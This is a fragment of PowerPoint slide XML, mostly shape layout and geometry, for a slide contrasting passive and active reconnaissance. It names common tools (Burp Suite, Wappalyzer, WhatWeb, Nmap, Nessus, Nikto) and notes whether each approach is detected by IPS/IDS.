            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="727575" y="2812531"/>
              <a:ext cx="2454538" cy="864053"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 212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15" name="Group 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E81360-816A-49A0-B680-DDEE9F1D392D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7420425" y="5091333"/>
            <a:ext cx="3837600" cy="921656"/>
            <a:chOff x="5896425" y="4777300"/>
            <a:chExt cx="2521384" cy="921656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Pentagon 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F7CEF2-67B7-4C87-9FD2-F26470F18B0A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5896425" y="4834903"/>
              <a:ext cx="2435851"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Pentagon 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B37F905-397F-4C5B-931E-5210E6A335C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5981958" y="4777300"/>
              <a:ext cx="2435851" cy="864053"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 212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18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B5EED9-F3B6-4087-81D1-5CCCA6FDAB97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7420425" y="1830146"/>
            <a:ext cx="3837600" cy="921656"/>
            <a:chOff x="5896425" y="1830146"/>
            <a:chExt cx="2521384" cy="921656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Pentagon 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C84A19-5B1F-4ECB-80AC-D1D9D4C50B1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5896425" y="1895259"/>
              <a:ext cx="2454538" cy="85654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Pentagon 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D4B95FA-D859-42BC-A113-4FC4E52AA0E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5963271" y="1830146"/>
              <a:ext cx="2454538" cy="856543"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 212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21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{068A8EC5-BF31-430D-BA89-C004E42047D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="951345" y="1830148"/>
            <a:ext cx="3835924" cy="921655"/>
            <a:chOff x="727575" y="1830146"/>
            <a:chExt cx="2535694" cy="921655"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Pentagon 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC8D60E-C47C-44A9-8470-DF5F22C5CE90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="808731" y="188774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sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Pentagon 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7E8EE8-2E5C-462B-BCB8-9341B147E4A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="727575" y="1830146"/>
              <a:ext cx="2454538" cy="864053"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 212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cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E03DA8-C10D-42BF-A8E9-63890E2E928E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="951345" y="5091333"/>
            <a:ext cx="3835924" cy="921656"/>
            <a:chOff x="727575" y="4777300"/>
            <a:chExt cx="2535694" cy="921656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Pentagon 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5417DA-F3F6-4121-A192-C7442F727087}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="808731" y="4834903"/>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Pentagon 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A72C47-B451-4C5E-BAE8-DD53ABC8C008}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="727575" y="4777300"/>
              <a:ext cx="2454538" cy="864053"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 212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27" name="Group 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{877A3507-23CD-43C5-AD8B-9C2559F01BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="951345" y="4004272"/>
            <a:ext cx="3835924" cy="921655"/>
            <a:chOff x="727575" y="3794916"/>
            <a:chExt cx="2535694" cy="921655"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Pentagon 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6356AF0A-DBFC-4916-8779-EEBDA8B2716D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="808731" y="3852518"/>
              <a:ext cx="2454538" cy="864053"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 2125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Pentagon 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8D3FFE-6B61-464C-9A8C-8C695DF3030B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="727575" y="3794916"/>
              <a:ext cx="2454538" cy="864053"/>
            </a:xfrm>
            <a:prstGeom prst="homePlate">
              <a:avLst>
                <a:gd name="adj" fmla="val 212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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD6DDC7-1743-4461-B161-35E6E2D66B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277921" y="1878210"/>
            <a:ext cx="3060000"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Gather information about a target without directly interacting with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A17CE7-E519-4071-878E-5833F8F6E097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1195109" y="3084741"/>
            <a:ext cx="3060000"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Uses public resources that have </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>information on that target.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA3ACD77-606E-4CEE-9890-AC77C9E90DDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074114" y="4248197"/>
            <a:ext cx="3338973" cy="25621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Burp suite, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wappalyzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>whatweb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4825C824-489D-40B0-B866-CAD4E353BFE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1236667" y="5365973"/>
            <a:ext cx="3060000"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highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Will not detect by IPS/IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D7BE4C-84FA-4BD5-8730-617F32E36EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7835087" y="1873192"/>
            <a:ext cx="3338488" cy="242051"/>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Interact directly with a computer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>system in order to gather system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>specific information about the target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382FD1E1-1DB6-4EC2-98B0-53DF83B64783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7919537" y="2960639"/>
            <a:ext cx="3060000"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Relies on tools that will send </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>different types of requests to the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB55BFEF-B3BB-45FC-A593-50F313ED98EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7919537" y="4246322"/>
            <a:ext cx="3060000"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Nmap, Nessus, Nikto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Text Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F339F2CD-28D6-4C7F-B1AF-F81C605F9F0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7895333" y="5365973"/>
            <a:ext cx="3060000"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highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detected by IPS/IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Freeform: Shape 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC763714-50C6-4000-8E80-47688270844A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5875261" y="3645136"/>
            <a:ext cx="461477" cy="524194"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1345391 w 1544262"/>
              <a:gd name="connsiteY0" fmla="*/ 613209 h 1754137"/>
              <a:gd name="connsiteX1" fmla="*/ 1336057 w 1544262"/>
              <a:gd name="connsiteY1" fmla="*/ 605208 h 1754137"/>
              <a:gd name="connsiteX2" fmla="*/ 1338057 w 1544262"/>
              <a:gd name="connsiteY2" fmla="*/ 366131 h 1754137"/>
              <a:gd name="connsiteX3" fmla="*/ 946199 w 1544262"/>
              <a:gd name="connsiteY3" fmla="*/ 180 h 1754137"/>
              <a:gd name="connsiteX4" fmla="*/ 566246 w 1544262"/>
              <a:gd name="connsiteY4" fmla="*/ 3038 h 1754137"/>
              <a:gd name="connsiteX5" fmla="*/ 211726 w 1544262"/>
              <a:gd name="connsiteY5" fmla="*/ 315362 h 1754137"/>
              <a:gd name="connsiteX6" fmla="*/ 206582 w 1544262"/>
              <a:gd name="connsiteY6" fmla="*/ 613781 h 1754137"/>
              <a:gd name="connsiteX7" fmla="*/ 169530 w 1544262"/>
              <a:gd name="connsiteY7" fmla="*/ 621591 h 1754137"/>
              <a:gd name="connsiteX8" fmla="*/ 1223 w 1544262"/>
              <a:gd name="connsiteY8" fmla="*/ 812758 h 1754137"/>
              <a:gd name="connsiteX9" fmla="*/ 461 w 1544262"/>
              <a:gd name="connsiteY9" fmla="*/ 964872 h 1754137"/>
              <a:gd name="connsiteX10" fmla="*/ 44181 w 1544262"/>
              <a:gd name="connsiteY10" fmla="*/ 1007068 h 1754137"/>
              <a:gd name="connsiteX11" fmla="*/ 153433 w 1544262"/>
              <a:gd name="connsiteY11" fmla="*/ 1007163 h 1754137"/>
              <a:gd name="connsiteX12" fmla="*/ 208678 w 1544262"/>
              <a:gd name="connsiteY12" fmla="*/ 1052979 h 1754137"/>
              <a:gd name="connsiteX13" fmla="*/ 151718 w 1544262"/>
              <a:gd name="connsiteY13" fmla="*/ 1097460 h 1754137"/>
              <a:gd name="connsiteX14" fmla="*/ 37704 w 1544262"/>
              <a:gd name="connsiteY14" fmla="*/ 1096984 h 1754137"/>
              <a:gd name="connsiteX15" fmla="*/ 842 w 1544262"/>
              <a:gd name="connsiteY15" fmla="*/ 1135275 h 1754137"/>
              <a:gd name="connsiteX16" fmla="*/ 842 w 1544262"/>
              <a:gd name="connsiteY16" fmla="*/ 1173279 h 1754137"/>
              <a:gd name="connsiteX17" fmla="*/ 38752 w 1544262"/>
              <a:gd name="connsiteY17" fmla="*/ 1211093 h 1754137"/>
              <a:gd name="connsiteX18" fmla="*/ 157529 w 1544262"/>
              <a:gd name="connsiteY18" fmla="*/ 1210903 h 1754137"/>
              <a:gd name="connsiteX19" fmla="*/ 208773 w 1544262"/>
              <a:gd name="connsiteY19" fmla="*/ 1255671 h 1754137"/>
              <a:gd name="connsiteX20" fmla="*/ 157910 w 1544262"/>
              <a:gd name="connsiteY20" fmla="*/ 1300152 h 1754137"/>
              <a:gd name="connsiteX21" fmla="*/ 43895 w 1544262"/>
              <a:gd name="connsiteY21" fmla="*/ 1299771 h 1754137"/>
              <a:gd name="connsiteX22" fmla="*/ 747 w 1544262"/>
              <a:gd name="connsiteY22" fmla="*/ 1342062 h 1754137"/>
              <a:gd name="connsiteX23" fmla="*/ 842 w 1544262"/>
              <a:gd name="connsiteY23" fmla="*/ 1380067 h 1754137"/>
              <a:gd name="connsiteX24" fmla="*/ 35894 w 1544262"/>
              <a:gd name="connsiteY24" fmla="*/ 1415786 h 1754137"/>
              <a:gd name="connsiteX25" fmla="*/ 149908 w 1544262"/>
              <a:gd name="connsiteY25" fmla="*/ 1415786 h 1754137"/>
              <a:gd name="connsiteX26" fmla="*/ 208487 w 1544262"/>
              <a:gd name="connsiteY26" fmla="*/ 1461887 h 1754137"/>
              <a:gd name="connsiteX27" fmla="*/ 146384 w 1544262"/>
              <a:gd name="connsiteY27" fmla="*/ 1506559 h 1754137"/>
              <a:gd name="connsiteX28" fmla="*/ 41800 w 1544262"/>
              <a:gd name="connsiteY28" fmla="*/ 1505988 h 1754137"/>
              <a:gd name="connsiteX29" fmla="*/ 176 w 1544262"/>
              <a:gd name="connsiteY29" fmla="*/ 1545040 h 1754137"/>
              <a:gd name="connsiteX30" fmla="*/ 207058 w 1544262"/>
              <a:gd name="connsiteY30" fmla="*/ 1754018 h 1754137"/>
              <a:gd name="connsiteX31" fmla="*/ 1328818 w 1544262"/>
              <a:gd name="connsiteY31" fmla="*/ 1754114 h 1754137"/>
              <a:gd name="connsiteX32" fmla="*/ 1544178 w 1544262"/>
              <a:gd name="connsiteY32" fmla="*/ 1538373 h 1754137"/>
              <a:gd name="connsiteX33" fmla="*/ 1544178 w 1544262"/>
              <a:gd name="connsiteY33" fmla="*/ 877623 h 1754137"/>
              <a:gd name="connsiteX34" fmla="*/ 1345391 w 1544262"/>
              <a:gd name="connsiteY34" fmla="*/ 613209 h 1754137"/>
              <a:gd name="connsiteX35" fmla="*/ 388891 w 1544262"/>
              <a:gd name="connsiteY35" fmla="*/ 693695 h 1754137"/>
              <a:gd name="connsiteX36" fmla="*/ 237253 w 1544262"/>
              <a:gd name="connsiteY36" fmla="*/ 693791 h 1754137"/>
              <a:gd name="connsiteX37" fmla="*/ 203439 w 1544262"/>
              <a:gd name="connsiteY37" fmla="*/ 656834 h 1754137"/>
              <a:gd name="connsiteX38" fmla="*/ 236015 w 1544262"/>
              <a:gd name="connsiteY38" fmla="*/ 618924 h 1754137"/>
              <a:gd name="connsiteX39" fmla="*/ 321358 w 1544262"/>
              <a:gd name="connsiteY39" fmla="*/ 619305 h 1754137"/>
              <a:gd name="connsiteX40" fmla="*/ 387748 w 1544262"/>
              <a:gd name="connsiteY40" fmla="*/ 619020 h 1754137"/>
              <a:gd name="connsiteX41" fmla="*/ 432039 w 1544262"/>
              <a:gd name="connsiteY41" fmla="*/ 655595 h 1754137"/>
              <a:gd name="connsiteX42" fmla="*/ 388891 w 1544262"/>
              <a:gd name="connsiteY42" fmla="*/ 693695 h 1754137"/>
              <a:gd name="connsiteX43" fmla="*/ 905908 w 1544262"/>
              <a:gd name="connsiteY43" fmla="*/ 1263195 h 1754137"/>
              <a:gd name="connsiteX44" fmla="*/ 845900 w 1544262"/>
              <a:gd name="connsiteY44" fmla="*/ 1422548 h 1754137"/>
              <a:gd name="connsiteX45" fmla="*/ 786084 w 1544262"/>
              <a:gd name="connsiteY45" fmla="*/ 1482270 h 1754137"/>
              <a:gd name="connsiteX46" fmla="*/ 699692 w 1544262"/>
              <a:gd name="connsiteY46" fmla="*/ 1383115 h 1754137"/>
              <a:gd name="connsiteX47" fmla="*/ 650542 w 1544262"/>
              <a:gd name="connsiteY47" fmla="*/ 1278149 h 1754137"/>
              <a:gd name="connsiteX48" fmla="*/ 630349 w 1544262"/>
              <a:gd name="connsiteY48" fmla="*/ 1027737 h 1754137"/>
              <a:gd name="connsiteX49" fmla="*/ 892668 w 1544262"/>
              <a:gd name="connsiteY49" fmla="*/ 1006592 h 1754137"/>
              <a:gd name="connsiteX50" fmla="*/ 905908 w 1544262"/>
              <a:gd name="connsiteY50" fmla="*/ 1263195 h 1754137"/>
              <a:gd name="connsiteX51" fmla="*/ 904384 w 1544262"/>
              <a:gd name="connsiteY51" fmla="*/ 617019 h 1754137"/>
              <a:gd name="connsiteX52" fmla="*/ 482140 w 1544262"/>
              <a:gd name="connsiteY52" fmla="*/ 618353 h 1754137"/>
              <a:gd name="connsiteX53" fmla="*/ 430420 w 1544262"/>
              <a:gd name="connsiteY53" fmla="*/ 564917 h 1754137"/>
              <a:gd name="connsiteX54" fmla="*/ 430420 w 1544262"/>
              <a:gd name="connsiteY54" fmla="*/ 384704 h 1754137"/>
              <a:gd name="connsiteX55" fmla="*/ 431944 w 1544262"/>
              <a:gd name="connsiteY55" fmla="*/ 384228 h 1754137"/>
              <a:gd name="connsiteX56" fmla="*/ 430515 w 1544262"/>
              <a:gd name="connsiteY56" fmla="*/ 384133 h 1754137"/>
              <a:gd name="connsiteX57" fmla="*/ 611014 w 1544262"/>
              <a:gd name="connsiteY57" fmla="*/ 225732 h 1754137"/>
              <a:gd name="connsiteX58" fmla="*/ 933626 w 1544262"/>
              <a:gd name="connsiteY58" fmla="*/ 225637 h 1754137"/>
              <a:gd name="connsiteX59" fmla="*/ 1113934 w 1544262"/>
              <a:gd name="connsiteY59" fmla="*/ 409374 h 1754137"/>
              <a:gd name="connsiteX60" fmla="*/ 1117173 w 1544262"/>
              <a:gd name="connsiteY60" fmla="*/ 593778 h 1754137"/>
              <a:gd name="connsiteX61" fmla="*/ 1117458 w 1544262"/>
              <a:gd name="connsiteY61" fmla="*/ 613114 h 1754137"/>
              <a:gd name="connsiteX62" fmla="*/ 1117458 w 1544262"/>
              <a:gd name="connsiteY62" fmla="*/ 613114 h 1754137"/>
              <a:gd name="connsiteX63" fmla="*/ 904384 w 1544262"/>
